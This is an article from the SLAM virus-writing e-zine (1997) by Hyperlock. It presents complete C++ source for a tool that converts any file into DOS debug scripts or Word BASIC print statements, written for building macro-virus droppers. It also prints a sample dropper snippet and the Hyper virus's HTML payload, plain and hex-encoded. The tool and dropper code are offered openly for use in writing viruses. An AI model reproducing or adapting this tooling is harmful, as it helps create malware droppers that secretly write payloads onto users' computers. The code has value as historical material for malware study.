SLAM3.007: Debug Script Data Maker by Hyperlock [SLAM]
Debug Script Data Maker
by Hyperlock [SLAM]
If you ever wanted an easy way to create all those debug statements for your dropper in Word BASIC, well now you can. If you don't know what a dropper is, then you may be reading the wrong article. If, however, you do or you just don't care but want to know how to create the code anyway, then read on.
Before anyone e-mails me and tells me, yes this utility can be used to create debug scripts for asm or Excel virii or whatever. I just used Word as an example.
OK, as quick recap. A dropper in a Word BASIC virus normally utilises DOS debug to help create the dropped binary/text file. In a typical virus, code will look something like this:
Open p$ + "\hyper.dbg" For Output As #1 <- open Word output file
Print #1, "n hyper.dat" <- name of debug output file
Print #1, "e 0100 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54"
Print #1, "e 0110 49 54 4c 45 3e 4d 69 63 72 6f 73 6f 66 74 20 49"
.. .. .. .. Data statements .. .. .. .. ..
Print #1, "e 0310 4e 54 3e 0a 3c 2f 54 44 3e 0a 3c 2f 54 52 3e 0a"
Print #1, "e 0320 3c 2f 54 41 42 4c 45 3e 0a 3c 2f 42 4f 44 59 3e"
Print #1, "e 0330 0a 3c 2f 48 54 4d 4c 3e"
Print #1, "rcx" <- read cx (length register)
Print #1, "0238" <- length of file
Print #1, "w" <- write file
Print #1, "q" <- quit debug
Close #1 <- close Word output file
Now, wouldn't it be just great if all that crap was created for you from a standard virus file or text file (the file you want to drop). This is a piece of cake, and the code is below in C++. If you know little or nothing about C++, then the code below shows you the fundaments of constructors, destructores and objects. If you want to compile it, then I know it works on Borland compilers; I don't know if it works on Microsoft compilers, and quite frankly I don't give a shit. Microsoft compilers suck.
It works like this:
dmake [-w] <input file> <output file>
e.g. 1, dmake input.dat slam.scr
e.g. 2, dmake -w input.dat slam.scr
If you just want raw debug script output (see the first output example after the code), then don't pass the -w switch. If you want the program to create a proper basic output script for you, thus including the PRINT statements, pass the -w switch. That should save you a lot of time. :¨)
And, if you are forgetful or just don't pass the correct parms, you will see a nice little UNIX type of reminder. It is short but sweet, and you should never see it. The EXE is really small, and should accompany this mag.
Look, I know this is a DOS version with no pretty windows and all that crap. I haven't got the time to mess about and this works. If you want to make it better, then you are welcome to do so. Just make sure you put me down as being the original author and don't rip me off, OK. And that goes for anything else in this mag ...
DO NOT COPY VIRUS CODE OR PROGRAMS WRITTEN BY SLAM MEMBERS OR ANY CONTRIBUTING PROGRAMMER AND PUT YOUR NAME ON IT. You didn't write the thing, the authors have.
After this code, there is an example input file and output file. If you think back to the hyper virus in SLAM2, you will have noticed the Internet Explorer infection dropper. Well, in case you were wondering what code was in it, have a look after the C++ code below. Read the article in SLAM 2 to see how the whole thing manifests itself.
-------------------------------------------------------------------
#include <stdio.h>
#include <fcntl.h>
#include <mem.h>
#include <string.h>
#include <stdlib.h>
#include <io.h>
#include <conio.h>
#define NUM_PARTS 16 // number of bytes per line
//
// Debug Script Data Maker
// Hyperlock [SLAM], May 1997
// Version 1.03
//
//
// Class header definition for the data maker routines
//
class DMake
{
protected:
int InputFile; // pointer to input file
FILE *OutputFile; // pointer to output file
int bytesread; // number of bytes in input file
int SwchArray[10]; // switch flag array
// --> pos 0 = 'w' switch
public:
~DMake();
void SetSwitch(char *);
void Convert(char *infile, char *outfile);
};
//
// Null destructor
//
DMake::~DMake()
{
}
//
// Function to process command line switches
// Only processes one at the moment, but is easy to
// extend using the below structure.
//
void DMake::SetSwitch(char *swch)
{
// Reset switch array
for (int i=0; i<10; i++)
SwchArray[i]=0;
printf("Processing switches ...\n");
switch (swch[1])
{
case 'w':
printf("-w passed, will write BASIC print stream statements.\n\n");
SwchArray[0]=1;
break;
default:
printf("No recognised switches passed, assuming none.\n\n");
break;
}
}
//
// Function to create script file for an input file
//
void DMake::Convert(char *infile, char *outfile)
{
unsigned char buf[40000];
unsigned char inbyte;
char value[6], address[6];
int x=0, fl=0;
unsigned int z;
div_t rowtest;
// open file for input
InputFile = _open(infile, O_RDONLY);
OutputFile=fopen(outfile, "w");
if (InputFile != -1)
{
printf("opened file %s for input\n", infile);
printf("opened file %s for output\n", outfile);
printf("writing %d bytes per line\n", NUM_PARTS);
if ((bytesread = _read(InputFile, buf, 40000)) == -1)
{
printf("error reading input file %s\n", infile);
exit(0);
}
// read file a byte at a time until EOF
if (SwchArray[0]==1)
fprintf(OutputFile, "print #1, \"n myscript.scr\"\nprint #1, \"e 0100 ");
else
fprintf(OutputFile, "n myscript.scr\ne 0100 ");
while (fl < bytesread)
{
inbyte = buf[fl];
memset(value, '\0', 6);
memset(address, '\0', 6);
rowtest = div(x,NUM_PARTS);
if (rowtest.rem == 0 && x != 0)
{
if (SwchArray[0]==1)
fprintf(OutputFile, "\"\nprint #1, \"");
else
fprintf(OutputFile, "\n");
itoa(0x0100 + x, address, 16);
if (strlen(address) == 3)
fprintf(OutputFile, "e 0%s ", address);
else
fprintf(OutputFile, "e %s", address);
}
z = inbyte;
itoa(z,value,16);
if (strlen(value) == 1)
{
value[1] = value[0];
value[0] = '0';
}
fprintf(OutputFile, "%s ", value);
x++;
fl++;
}
itoa(x, address, 16);
if (SwchArray[0]==1)
{
fprintf(OutputFile, "\"\nprint #1, \"RCX\"\n");
if (strlen(address) == 3)
fprintf(OutputFile, "print #1, \"0%s\"\n", address);
else
fprintf(OutputFile, "print #1, \"%s\"\n", address);
fprintf(OutputFile, "print #1, \"W\"\nprint #1, \"Q\"\n");
}
else
{
fprintf(OutputFile, "\nRCX\n");
if (strlen(address) == 3)
fprintf(OutputFile, "0%s\n", address);
else
fprintf(OutputFile, "%s\n", address);
fprintf(OutputFile, "W\nQ\n");
}
// close files
if (_close(InputFile) == 0)
printf("closed input file %s\n", infile);
if (fclose(OutputFile) == 0)
printf("closed output file %s\n", outfile);
printf("done\n");
}
else
printf("Cannot find input file %s\n", infile);
}
void main(int argc, char **argv)
{
int i, t=0;
char *infile, *outfile, *sw;
DMake *hl; // pointer to DMake object
printf("Debug Script Data Maker\n");
printf("Hyperlock [SLAM], v1.03, May 1997\n\n");
printf("This program will write out a debug script in text format.\n\n");
sw = strlwr(argv[1]);
if (sw[0] != '-' && argc != 3)
t=1;
if (sw[0] == '-' && argc != 4)
t=1;
if (sw[0]=='-')
{
infile = argv[2];
outfile = argv[3];
}
else
{
infile = argv[1];
outfile = argv[2];
}
if (t)
{
printf("Warning: Incorrect number of parameters passed.\n");
printf("USAGE: dmake [-w] infile outfile\n");
printf("\n-w include BASIC print stream statements\n");
exit(0);
}
hl = new DMake(); // Create an instance of the DMake object
if (sw[0]=='-')
hl->SetSwitch(sw); // Process command line switches
else
printf("No switches passed ...\nWriting out a script in raw debug format.\n\n");
hl->Convert(infile, outfile);
delete hl; // Delete instance hl of the DMake
}
-------------------------------------------------------------------
Example input script to be piped into DMAKE. This is part of the payload for the Hyper virus, please see SLAM 2 for a description of the virus.
<HTML>
<HEAD>
<TITLE>Microsoft Internet Explorer</TITLE>
<SCRIPT LANGUAGE="JavaScript">
<!--
function ds()
{
window.status = "WM.Hyper has now infected Word and Internet Explorer!";
}
-->
</SCRIPT>
</HEAD>
<BODY onLoad="ds();">
<TABLE WIDTH=620 CELLPADDING=0 CELLSPACING=0 BORDER=0>
<TR>
<TD>
<FONT FACE="Arial" SIZE=2>
<MARQUEE WIDTH=600 SCROLLDELAY=80 BORDER=0>
Your system has been infected with the WM.Hyper virus.
It looks like you are gonna have to take some remedial action ...
(c) Hyperlock, March 1997
</MARQUEE>
</FONT>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
-------------------------------------------------------------------
Example output script created by DMAKE using the about input file and NO SWITCH.
** RAW OUTPUT **
n myscript.scr
e 0100 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54
e 0110 49 54 4c 45 3e 4d 69 63 72 6f 73 6f 66 74 20 49
e 0120 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72
e 0130 3c 2f 54 49 54 4c 45 3e 0a 3c 53 43 52 49 50 54
e 0140 20 4c 41 4e 47 55 41 47 45 3d 22 4a 61 76 61 53
e 0150 63 72 69 70 74 22 3e 0a 3c 21 2d 2d 0a 66 75 6e
e 0160 63 74 69 6f 6e 20 64 73 28 29 0a 7b 0a 77 69 6e
e 0170 64 6f 77 2e 73 74 61 74 75 73 20 3d 20 22 57 4d
e 0180 2e 48 79 70 65 72 20 68 61 73 20 6e 6f 77 20 69
e 0190 6e 66 65 63 74 65 64 20 57 6f 72 64 20 61 6e 64
e 01a0 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72
e 01b0 65 72 21 22 3b 0a 7d 0a 2d 2d 3e 0a 3c 2f 53 43
e 01c0 52 49 50 54 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42
e 01d0 4f 44 59 20 6f 6e 4c 6f 61 64 3d 22 64 73 28 29
e 01e0 3b 22 3e 0a 3c 54 41 42 4c 45 20 57 49 44 54 48
e 01f0 3d 36 32 30 20 43 45 4c 4c 50 41 44 44 49 4e 47
e 0200 3d 30 20 43 45 4c 4c 53 50 41 43 49 4e 47 3d 30
e 0210 20 42 4f 52 44 45 52 3d 30 3e 0a 3c 54 52 3e 0a
e 0220 3c 54 44 3e 0a 3c 46 4f 4e 54 20 46 41 43 45 3d
e 0230 22 41 72 69 61 6c 22 20 53 49 5a 45 3d 32 3e 0a
e 0240 3c 4d 41 52 51 55 45 45 20 57 49 44 54 48 3d 36
e 0250 30 30 20 53 43 52 4f 4c 4c 44 45 4c 41 59 3d 38
e 0260 30 20 42 4f 52 44 45 52 3d 30 3e 0a 59 6f 75 72
e 0270 20 73 79 73 74 65 6d 20 68 61 73 20 62 65 65 6e
e 0280 20 69 6e 66 65 63 74 65 64 20 77 69 74 68 20 74
e 0290 68 65 20 57 4d 2e 48 79 70 65 72 20 76 69 72 75
e 02a0 73 2e 20 0a 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b
e 02b0 65 20 79 6f 75 20 61 72 65 20 67 6f 6e 6e 61 20
e 02c0 68 61 76 65 20 74 6f 20 74 61 6b 65 20 73 6f 6d
e 02d0 65 20 72 65 6d 65 64 69 61 6c 20 61 63 74 69 6f
e 02e0 6e 20 2e 2e 2e 20 0a 28 63 29 20 48 79 70 65 72
e 02f0 6c 6f 63 6b 2c 20 4d 61 72 63 68 20 31 39 39 37
e 0300 0a 3c 2f 4d 41 52 51 55 45 45 3e 0a 3c 2f 46 4f
e 0310 4e 54 3e 0a 3c 2f 54 44 3e 0a 3c 2f 54 52 3e 0a
e 0320 3c 2f 54 41 42 4c 45 3e 0a 3c 2f 42 4f 44 59 3e
e 0330 0a 3c 2f 48 54 4d 4c 3e
RCX
0238
W
Q
-------------------------------------------------------------------
Example output script created by DMAKE using the about input file and -w SWITCH.
** VB, VBA or Word BASIC **
print #1, "n myscript.scr"
print #1, "e 0100 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 "
print #1, "e 0110 49 54 4c 45 3e 4d 69 63 72 6f 73 6f 66 74 20 49 "
print #1, "e 0120 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 "
print #1, "e 0130 3c 2f 54 49 54 4c 45 3e 0a 3c 53 43 52 49 50 54 "
print #1, "e 0140 20 4c 41 4e 47 55 41 47 45 3d 22 4a 61 76 61 53 "
print #1, "e 0150 63 72 69 70 74 22 3e 0a 3c 21 2d 2d 0a 66 75 6e "
print #1, "e 0160 63 74 69 6f 6e 20 64 73 28 29 0a 7b 0a 77 69 6e "
print #1, "e 0170 64 6f 77 2e 73 74 61 74 75 73 20 3d 20 22 57 4d "
print #1, "e 0180 2e 48 79 70 65 72 20 68 61 73 20 6e 6f 77 20 69 "
print #1, "e 0190 6e 66 65 63 74 65 64 20 57 6f 72 64 20 61 6e 64 "
print #1, "e 01a0 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 "
print #1, "e 01b0 65 72 21 22 3b 0a 7d 0a 2d 2d 3e 0a 3c 2f 53 43 "
print #1, "e 01c0 52 49 50 54 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 "
print #1, "e 01d0 4f 44 59 20 6f 6e 4c 6f 61 64 3d 22 64 73 28 29 "
print #1, "e 01e0 3b 22 3e 0a 3c 54 41 42 4c 45 20 57 49 44 54 48 "
print #1, "e 01f0 3d 36 32 30 20 43 45 4c 4c 50 41 44 44 49 4e 47 "
print #1, "e 0200 3d 30 20 43 45 4c 4c 53 50 41 43 49 4e 47 3d 30 "
print #1, "e 0210 20 42 4f 52 44 45 52 3d 30 3e 0a 3c 54 52 3e 0a "
print #1, "e 0220 3c 54 44 3e 0a 3c 46 4f 4e 54 20 46 41 43 45 3d "
print #1, "e 0230 22 41 72 69 61 6c 22 20 53 49 5a 45 3d 32 3e 0a "
print #1, "e 0240 3c 4d 41 52 51 55 45 45 20 57 49 44 54 48 3d 36 "
print #1, "e 0250 30 30 20 53 43 52 4f 4c 4c 44 45 4c 41 59 3d 38 "
print #1, "e 0260 30 20 42 4f 52 44 45 52 3d 30 3e 0a 59 6f 75 72 "
print #1, "e 0270 20 73 79 73 74 65 6d 20 68 61 73 20 62 65 65 6e "
print #1, "e 0280 20 69 6e 66 65 63 74 65 64 20 77 69 74 68 20 74 "
print #1, "e 0290 68 65 20 57 4d 2e 48 79 70 65 72 20 76 69 72 75 "
print #1, "e 02a0 73 2e 20 0a 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b "
print #1, "e 02b0 65 20 79 6f 75 20 61 72 65 20 67 6f 6e 6e 61 20 "
print #1, "e 02c0 68 61 76 65 20 74 6f 20 74 61 6b 65 20 73 6f 6d "
print #1, "e 02d0 65 20 72 65 6d 65 64 69 61 6c 20 61 63 74 69 6f "
print #1, "e 02e0 6e 20 2e 2e 2e 20 0a 28 63 29 20 48 79 70 65 72 "
print #1, "e 02f0 6c 6f 63 6b 2c 20 4d 61 72 63 68 20 31 39 39 37 "
print #1, "e 0300 0a 3c 2f 4d 41 52 51 55 45 45 3e 0a 3c 2f 46 4f "
print #1, "e 0310 4e 54 3e 0a 3c 2f 54 44 3e 0a 3c 2f 54 52 3e 0a "
print #1, "e 0320 3c 2f 54 41 42 4c 45 3e 0a 3c 2f 42 4f 44 59 3e "
print #1, "e 0330 0a 3c 2f 48 54 4d 4c 3e "
print #1, "RCX"
print #1, "0238"
print #1, "W"
print #1, "Q"
-------------------------------------------------------------------
Enjoy, and please let me know if you find this useful.
Hyperlock [SLAM]e-mail: hyperlock@usa.net